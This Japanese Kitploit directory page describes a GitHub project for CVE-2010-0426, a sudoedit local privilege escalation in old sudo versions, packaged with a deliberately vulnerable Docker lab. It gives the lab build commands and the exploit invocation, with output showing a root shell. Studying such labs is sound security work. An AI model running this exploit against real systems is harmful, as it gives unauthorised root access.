Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 および 1.7.x <= 1.7.2p4 ローカル権限昇格と脆弱なコンテナ | Kitploit
ツール/GitHubGitHub/t0kx/privesc-cve-2010-0426
特権昇格コンテナセキュリティ脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 および 1.7.x <= 1.7.2p4 ローカル権限昇格と脆弱なコンテナ

リポジトリを見る
11138年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sudo 1.6.x<=1.6.9p21 および 1.7.x<=1.7.2p4 のローカル権限昇格

Sudo (su "do") は、システム管理者が特定のユーザー(またはユーザーグループ)に対して、すべてのコマンドと引数を記録しながら、一部(またはすべて)のコマンドを root として実行する権限を付与できるようにするツールです。

脆弱な環境

テスト用の脆弱な環境を構築するには、Docker のインストールが必要です。次のコマンドを実行するだけです:

root@kitploit:~
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

これにより、低権限ユーザーで対話型シェルが起動します。

脆弱なコード

このバグは sudoedit で見つかりました。sudoedit は 'sudoedit' コマンドを正しく処理しないため、悪意のあるユーザーが実際の sudoedit コマンドを任意のコマンドに置き換えることができます。

ローカルの攻撃者はこの問題を悪用して、'root' ユーザーとして任意のコマンドを実行できる可能性があります。攻撃が成功すると、影響を受けるコンピュータが完全に侵害される可能性があります。

エクスプロイト

このターゲットを悪用するには、次のコマンドを実行するだけです:

root@kitploit:~
./exploit.sh

この脆弱なイメージを使用している場合は、次のコマンドを実行するだけです:

root@kitploit:~
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

クレジット

この欠陥は Slouching によって発見されました。

免責事項

本プログラムおよび以前のプログラムは教育目的のみを対象としています。許可なく使用しないでください。通常の免責事項が適用されます。特に、これらのプログラムによって提供される情報や機能を直接的または間接的に使用したことによるいかなる損害についても、私(t0kx)は責任を負いません。作者またはいかなるインターネットプロバイダーも、これらのプログラムまたはその派生プログラムの内容や誤用について一切責任を負いません。これらのプログラムを使用することにより、これらのプログラムの使用によって生じたいかなる損害(データ損失、システムクラッシュ、システム侵害など)も t0kx の責任ではないことを受け入れたものとみなされます。

ツールをダウンロード